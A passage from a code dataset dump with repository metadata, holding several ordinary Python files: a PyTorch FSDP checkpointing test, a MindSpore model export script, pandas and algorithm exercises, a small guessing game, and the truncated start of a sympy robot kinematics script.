You can\n also specify a string that is the name of the ``.state`` file\n \"\"\"\n DEFAULT = -1 #: Start the game at the default savestate from ``metadata.json``\n NONE = 0 #: Start the game at the power on screen for the emulator\n\n\nclass Observations(Enum):\n \"\"\"\n Different settings for the observation space of the environment\n \"\"\"\n IMAGE = 0 #: Use RGB image observations\n RAM = 1 #: Use RAM observations where you can see the memory of the game instead of the screen\n\n\nclass Actions(Enum):\n \"\"\"\n Different settings for the action space of the environment\n \"\"\"\n ALL = 0 #: MultiBinary action space with no filtered actions\n FILTERED = 1 #: MultiBinary action space with invalid or not allowed actions filtered out\n DISCRETE = 2 #: Discrete action space for filtered actions\n MULTI_DISCRETE = 3 #: MultiDiscete action space for filtered actions"},"avg_line_length":{"kind":"number","value":36.2857142857,"string":"36.285714"},"max_line_length":{"kind":"number","value":99,"string":"99"},"alphanum_fraction":{"kind":"number","value":0.6958661417,"string":"0.695866"}}},{"rowIdx":46389,"cells":{"hexsha":{"kind":"string","value":"f766b23e2080d4363dc21b4a4bf6048e315bfffb"},"size":{"kind":"number","value":7556,"string":"7,556"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_stars_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_stars_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_stars_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n 
\"Intel\"\n]"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-04-24T13:41:12.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-07-09T07:32:09.000Z"},"max_issues_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_issues_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_issues_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_issues_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n \"Intel\"\n]"},"max_issues_count":{"kind":"number","value":14,"string":"14"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-14T06:58:50.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-12-17T11:51:07.000Z"},"max_forks_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_forks_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_forks_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_forks_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n \"Intel\"\n]"},"max_forks_count":{"kind":"number","value":7,"string":"7"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-08-31T22:49:59.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-09-15T14:29:07.000Z"},"content":{"kind":"string","value":"# Owner(s): [\"oncall: distributed\"]\n\nimport contextlib\nfrom copy import deepcopy\nfrom functools import partial\n\nimport torch\nimport torch.nn as nn\nfrom torch.distributed._fsdp.fully_sharded_data_parallel import (\n FullyShardedDataParallel as FSDP,\n CPUOffload,\n)\nfrom torch.distributed.algorithms._checkpoint._checkpoint_wrapper import (\n checkpoint_wrapper,\n)\nfrom torch.testing._internal.common_distributed import (\n skip_if_lt_x_gpu,\n)\nfrom 
torch.testing._internal.common_fsdp import (\n FSDPTest,\n _maybe_wrap_fsdp,\n)\nfrom torch.testing._internal.common_utils import (\n run_tests,\n parametrize,\n instantiate_parametrized_tests,\n)\nfrom torch.utils.checkpoint import checkpoint\n\n\nclass TestFSDPCheckpoint(FSDPTest):\n class SequentialModule(nn.Module):\n def __init__(\n self,\n checkpoint_layer=False,\n offload_activations=False,\n wrap_fsdp=False,\n *fsdp_args,\n **fsdp_kwargs,\n ):\n torch.manual_seed(0)\n torch.cuda.manual_seed(0)\n super().__init__()\n l1 = nn.Linear(3, 3).cuda()\n l2 = nn.Linear(3, 3).cuda()\n l3 = nn.Linear(3, 3).cuda()\n\n if checkpoint_layer:\n ckpt_wrapper = partial(\n checkpoint_wrapper, offload_to_cpu=offload_activations\n )\n\n l1 = ckpt_wrapper(l1)\n l2 = ckpt_wrapper(l2)\n l3 = ckpt_wrapper(l3)\n\n fsdp_wrapper = partial(\n _maybe_wrap_fsdp, wrap_fsdp=wrap_fsdp, *fsdp_args, **fsdp_kwargs\n )\n self.ffn = nn.Sequential(\n fsdp_wrapper(l1),\n fsdp_wrapper(l2),\n fsdp_wrapper(l3),\n )\n\n def forward(self, x):\n return self.ffn(x)\n\n def _verify_parity(self, losses, outputs, models):\n assert losses\n assert outputs\n assert models\n\n for (l, o) in zip(losses[1:], outputs[1:]):\n self.assertEqual(losses[0], l)\n self.assertEqual(outputs[0], o)\n\n # Verify grads\n ref_model = models[0]\n ref_grads = [p.grad for p in ref_model.parameters()]\n for m in models[1:]:\n grads = [p.grad for p in m.parameters()]\n for ref_g, g in zip(ref_grads, grads):\n self.assertEqual(ref_g, g)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\n \"cpu_offload\",\n [CPUOffload(offload_params=True), CPUOffload(offload_params=False)],\n )\n @parametrize(\"offload_activations\", [True, False])\n def test_checkpoint_fsdp_wrapping(self, cpu_offload, offload_activations):\n # Test checkpoint(FSDP(layer1), FSDP(layer2), ....)\n ckpt_sequential_wrapped_fsdp = checkpoint_wrapper(\n TestFSDPCheckpoint.SequentialModule(\n wrap_fsdp=True, cpu_offload=cpu_offload\n ),\n offload_to_cpu=offload_activations,\n )\n 
# Test FSDP(checkpoint(layer1)), FSDP(checkpoint(layer2)), ....\n inner_ckpt = TestFSDPCheckpoint.SequentialModule(\n checkpoint_layer=True,\n offload_activations=offload_activations,\n wrap_fsdp=True,\n cpu_offload=cpu_offload,\n )\n\n baseline = TestFSDPCheckpoint.SequentialModule(\n wrap_fsdp=True, cpu_offload=cpu_offload\n )\n\n # note that reentrant-based checkpointing requires inputs to have grad\n # flag set.\n inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True)\n\n models = [ckpt_sequential_wrapped_fsdp, inner_ckpt, baseline]\n\n offload_to_cpu_event = \"Memcpy DtoH\"\n\n for i in range(2):\n losses = []\n outputs = []\n for m in models:\n check_offload = m != baseline and i == 0 and offload_activations\n profiler_ctx = (\n torch.profiler.profile(use_cuda=True)\n if check_offload\n else contextlib.suppress()\n )\n with profiler_ctx as prof:\n out = m(inp)\n\n if check_offload:\n event_names = [event.name for event in prof.events()]\n offload_occured = any(\n offload_to_cpu_event in name for name in event_names\n )\n self.assertTrue(offload_occured)\n loss = out.sum()\n loss.backward()\n losses.append(loss)\n outputs.append(out)\n\n self._verify_parity(losses, outputs, models)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\n \"cpu_offload\",\n [CPUOffload(offload_params=True), CPUOffload(offload_params=False)],\n )\n @parametrize(\"offload_activations\", [True, False])\n def test_basic_checkpoint_end_to_end(self, cpu_offload, offload_activations):\n seq = TestFSDPCheckpoint.SequentialModule().to(torch.cuda.current_device())\n # Runs FSDP with no checkpointing\n fsdp_only_seq = FSDP(deepcopy(seq), cpu_offload=cpu_offload)\n # Runs checkpoint-wrapped FSDP\n checkpointed_fsdp = checkpoint_wrapper(\n FSDP(deepcopy(seq), cpu_offload=cpu_offload),\n offload_to_cpu=offload_activations,\n )\n # Runs FSDP-wrapped checkpointed module\n fsdp_wrapped_checkpoint = FSDP(\n checkpoint_wrapper(deepcopy(seq), offload_to_cpu=offload_activations),\n 
cpu_offload=cpu_offload,\n )\n # Runs FSDP with manual calls to checkpoint.\n fsdp_call_checkpoint = FSDP(deepcopy(seq), cpu_offload=cpu_offload)\n # note that reentrant-based checkpointing requires inputs to have grad\n # flag set.\n\n inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True)\n\n models = [\n fsdp_only_seq,\n checkpointed_fsdp,\n fsdp_wrapped_checkpoint,\n fsdp_call_checkpoint,\n ]\n\n offload_to_cpu_event = \"Memcpy DtoH\"\n\n for i in range(6):\n losses = []\n outputs = []\n for m in models:\n check_offload = m != fsdp_only_seq and i == 0 and offload_activations\n profiler_ctx = (\n torch.profiler.profile(use_cuda=True)\n if check_offload\n else contextlib.suppress()\n )\n with profiler_ctx as prof:\n if m == fsdp_call_checkpoint:\n offload_ctx = (\n torch.autograd.graph.save_on_cpu(pin_memory=True)\n if offload_activations\n else contextlib.suppress()\n )\n with offload_ctx:\n out = checkpoint(m, inp)\n else:\n out = m(inp)\n\n if check_offload:\n event_names = [event.name for event in prof.events()]\n offload_occured = any(\n offload_to_cpu_event in name for name in event_names\n )\n self.assertTrue(offload_occured)\n loss = out.sum()\n loss.backward()\n losses.append(loss)\n outputs.append(out)\n\n self._verify_parity(losses, outputs, models)\n\ninstantiate_parametrized_tests(TestFSDPCheckpoint)\n\nif __name__ == \"__main__\":\n 
run_tests()\n"},"avg_line_length":{"kind":"number","value":34.1900452489,"string":"34.190045"},"max_line_length":{"kind":"number","value":88,"string":"88"},"alphanum_fraction":{"kind":"number","value":0.5717310746,"string":"0.571731"}}},{"rowIdx":46390,"cells":{"hexsha":{"kind":"string","value":"f7913068c3042169ee6c413f8ef205e68a9963ab"},"size":{"kind":"number","value":2716,"string":"2,716"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list 
like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\npython start.py\n\"\"\"\nimport os\nimport glob\nimport argparse\nimport numpy as np\nfrom mindspore import export\nfrom mindspore import Tensor\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\nfrom src.iresnet import iresnet100\n\nDATA_PATH = \"/cache/data_path_\"\nCKPT_PATH = \"/cache/ckpt/\"\n\nparser = argparse.ArgumentParser(description='Mindspore ImageNet Training')\nparser.add_argument('--train_url', default='', type=str,\n help='output path')\nparser.add_argument('--data_url', default='', type=str)\n# Datasets\nparser.add_argument('--batch_size', default=1, type=int, metavar='N',\n help='train batchsize (default: 256)')\n\nparser.add_argument('--modelarts', type=bool, default=True)\nargs = parser.parse_args()\n\n\ndef frozen_to_air(modelnet, modelargs):\n param_dict = load_checkpoint(modelargs.get(\"ckpt_file\"))\n load_param_into_net(modelnet, param_dict)\n\n input_arr = Tensor(\n 
np.zeros([modelargs.get(\"batch_size\"), 3, modelargs.get(\"height\"), modelargs.get(\"width\")], np.float32))\n export(modelnet, input_arr, file_name=modelargs.get(\"file_name\"), file_format=modelargs.get(\"file_format\"))\n\n\nif __name__ == \"__main__\":\n import moxing as mox\n\n if not os.path.exists(DATA_PATH):\n os.makedirs(DATA_PATH, 0o755)\n mox.file.copy_parallel(src_url=args.data_url, dst_url=CKPT_PATH)\n prefix = \"ArcFace\"\n ckpt_list = glob.glob(CKPT_PATH + prefix + \"*.ckpt\")\n if not ckpt_list:\n print(\"ckpt file not generated.\")\n\n ckpt_list.sort(key=os.path.getmtime)\n ckpt_model = ckpt_list[-1]\n net = iresnet100()\n frozen_to_air_args = {'ckpt_file': ckpt_model,\n 'batch_size': args.batch_size,\n 'height': 112,\n 'width': 112,\n 'file_name': (CKPT_PATH + prefix),\n 'file_format': 'AIR'}\n frozen_to_air(net, frozen_to_air_args)\n\n if args.modelarts:\n mox.file.copy_parallel(src_url=CKPT_PATH, dst_url=args.train_url)\n"},"avg_line_length":{"kind":"number","value":36.2133333333,"string":"36.213333"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.6704712813,"string":"0.670471"}}},{"rowIdx":46391,"cells":{"hexsha":{"kind":"string","value":"540d424532ff9f498d7d0a5c8cc540f93970db70"},"size":{"kind":"number","value":713,"string":"713"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_stars_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_stars_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_issues_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_issues_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_forks_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_forks_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import pandas as pd\nimport numpy as np\n\ndata = [22, 33, 41, 12]\nindex = [\"A\", \"B\", \"C\", \"D\"]\ns = pd.Series(data, name='Age', index=index)\nprint(s)\nprint(s[\"B\"])\nprint(s[2])\n\ndata_dict = {\n \"A\": 28,\n \"B\": 42,\n \"C\": 1337,\n \"D\": 43,\n}\n\n# index kann gesetzt werden und ändert auch die Reihenfolge und werte können\n# wiederholt werden\ns2 = pd.Series(data_dict, index=[\"A\", 'B', 'D', 'E', 'C', 'A'])\nprint(s2)\n\n#unnützer datatype wird zurückgesetzt\ns3 = pd.Series(np.random.randn(10), dtype=np.int32)\nprint(s3)\ns3 = pd.Series(np.random.randint(12, 25, 10), dtype=np.int32)\nprint(s3)\n\n# Achtun slice: nicht möglich: s[1:3][0], da index beibehalten wird\n\n# Filtern\nprint(s3[s3 < 
s3.mean()])\nprint(np.log(s3))\n"},"avg_line_length":{"kind":"number","value":20.9705882353,"string":"20.970588"},"max_line_length":{"kind":"number","value":76,"string":"76"},"alphanum_fraction":{"kind":"number","value":0.6325385694,"string":"0.632539"}}},{"rowIdx":46392,"cells":{"hexsha":{"kind":"string","value":"54a5a39aa2099d456ab0d02ac4fb47014ac0ba69"},"size":{"kind":"number","value":1400,"string":"1,400"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_stars_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-08-16T14:52:05.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-16T14:52:05.000Z"},"max_issues_repo_path":{"kind":"string","value":"Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_issues_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Problems/Depth-First 
Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_forks_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# Recursive Magic\n# def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n# def get_min_dif(node, low, high):\n# if not node:\n# return high - low\n#\n# left = get_min_dif(node.left, low, node.val)\n# right = get_min_dif(node.right, node.val, high)\n#\n# return min(left, right)\n#\n# return get_min_dif(root, float('-inf'), float('inf'))\n\n# Recursive Inorder DFS\n# def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n# sorted_list = []\n#\n# def dfs(node: Optional[TreeNode]):\n# if node.left:\n# dfs(node.left)\n#\n# sorted_list.append(node.val)\n# if node.right:\n# dfs(node.right)\n#\n# dfs(root)\n# return min(b - a for a, b in zip(sorted_list, sorted_list[1:]))\n\n# Recursive inorder DFS\ndef getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n sorted_list = []\n\n def dfs(node):\n if node.left: dfs(node.left)\n sorted_list.append(node.val)\n if node.right: dfs(node.right)\n\n dfs(root)\n\n res = float('inf')\n for i in range(1, len(sorted_list)):\n res = min(res, sorted_list[i] - sorted_list[i - 1])\n\n return 
res"},"avg_line_length":{"kind":"number","value":25.9259259259,"string":"25.925926"},"max_line_length":{"kind":"number","value":69,"string":"69"},"alphanum_fraction":{"kind":"number","value":0.6014285714,"string":"0.601429"}}},{"rowIdx":46393,"cells":{"hexsha":{"kind":"string","value":"49c2612eb15938f0206a41d0a6921f4dfbb8879e"},"size":{"kind":"number","value":679,"string":"679"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_stars_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_stars_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_issues_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_issues_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_forks_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_forks_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# Задача 6. Вариант 22.\n# Создайте игру, в которой компьютер загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.\n\n# Titov S.G.\n# 11.04.2016\n\nimport random\n\nprint (\"Программа случайным образом загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.\")\n\nname_numbers = random.randint (1,2)\n\nif name_numbers == 1 :\n name = 'Ромул'\nelif name_numbers == 2 :\n name = 'Рем'\n\nanswer = input (\"Назовите одно из имен, легендарных основателей Рима: \")\n\nif answer == name:\n print ('\\nВы угадали!')\nelse :\n print ('\\nВы не угадали!')\n print ('Правильный ответ:', name)\n\ninput (\"\\nНажмите Enter для выхода.\")\n"},"avg_line_length":{"kind":"number","value":25.1481481481,"string":"25.148148"},"max_line_length":{"kind":"number","value":126,"string":"126"},"alphanum_fraction":{"kind":"number","value":0.70544919,"string":"0.705449"}}},{"rowIdx":46394,"cells":{"hexsha":{"kind":"string","value":"b72419d65127bf209e857f63197e4e47f112db09"},"size":{"kind":"number","value":1198,"string":"1,198"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"basics/lists.py"},"max_stars_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-04-07T23:14:29.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-04-07T23:14:29.000Z"},"max_issues_repo_path":{"kind":"string","value":"basics/lists.py"},"max_issues_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"basics/lists.py"},"max_forks_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from sys import stdin\nimport re\n\"\"\"\nThe first line contains an integer,N , denoting the number of commands.\nEach line of the subsequent lines contains one of the commands:\n insert i e: Insert integer at position .\n print: Print the list.\n remove e: Delete the first occurrence of integer .\n append e: Insert integer at the end of the list.\n sort: Sort the list.\n pop: Pop the last element from the list.\n reverse: Reverse the list.\n\"\"\"\n\ndef input_to_list(userinput):\n return re.sub(\"[^\\w]\", \" \", userinput).split()\n\nif __name__ == '__main__':\n N = int(input())\n list = []\n\n for i in range(0,N):\n userinput = stdin.readline()\n wordList = input_to_list(userinput)\n\n if \"insert\" == 
wordList[0]:\n list.insert(int(wordList[1]),int(wordList[2]))\n elif \"print\" in userinput:\n print(list)\n elif \"remove\" in userinput:\n list.remove(int(wordList[1]))\n elif \"append\" in userinput:\n list.append(int(wordList[1]))\n elif \"sort\" in userinput:\n list.sort()\n elif \"pop\" in userinput:\n list.pop()\n elif \"reverse\" in userinput:\n list.reverse()"},"avg_line_length":{"kind":"number","value":30.7179487179,"string":"30.717949"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphanum_fraction":{"kind":"number","value":0.6051752922,"string":"0.605175"}}},{"rowIdx":46395,"cells":{"hexsha":{"kind":"string","value":"3fcb65dba04aa41adca62639fb1dc876d15cd06f"},"size":{"kind":"number","value":19338,"string":"19,338"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_stars_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_stars_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_issues_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_issues_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_forks_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_forks_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"baxterロボの同時変換行列などをsympyで式展開し整理\n・左腕のみ\n\"\"\"\n\nimport sympy as sy\nimport math\nfrom sympy.printing.pycode import pycode\n\nt_independent = False\n\n\nL, h, H = sy.symbols(\"L, h, H\")\nL0, L1, L2, L3, L4, L5, L6 = sy.symbols(\"L0, L1, L2, L3, L4, L5, L6\")\n\n\n\nif t_independent:\n q1, q2, q3, q4, q5, q6, q7 = sy.symbols(\"q1, q2, q3, q4, q5, q6, q7\")\n c0 = sy.cos(sy.pi / 4)\n s0 = sy.sin(sy.pi / 4)\n c1 = sy.cos(q1)\n s1 = sy.sin(q1)\n c2 = sy.cos(q2)\n s2 = sy.sin(q2)\n c3 = sy.cos(q3)\n s3 = sy.sin(q3)\n c4 = sy.cos(q4)\n s4 = sy.sin(q4)\n c5 = sy.cos(q5)\n s5 = sy.sin(q5)\n c6 = sy.cos(q6)\n s6 = sy.sin(q6)\n c7 = sy.cos(q7)\n s7 = sy.sin(q7)\n # ジョイント角度ベクトル\n q = sy.Matrix([[q1, q2, q3, q4, q5, q6, q7]]).T\n\n\nif not t_independent:\n ### qを時間の関数にしたいとき ###\n t = sy.Symbol(\"t\")\n c0 = sy.cos(sy.pi / 4)\n s0 = sy.sin(sy.pi / 4)\n q1 = sy.Function(\"q1\")\n q2 = sy.Function(\"q2\")\n q3 = sy.Function(\"q3\")\n q4 = sy.Function(\"q4\")\n q5 = sy.Function(\"q5\")\n q6 = sy.Function(\"q6\")\n q7 = sy.Function(\"q7\")\n c1 = sy.cos(q1(t))\n s1 = sy.sin(q1(t))\n c2 = sy.cos(q2(t))\n s2 = sy.sin(q2(t))\n c3 = sy.cos(q3(t))\n s3 = 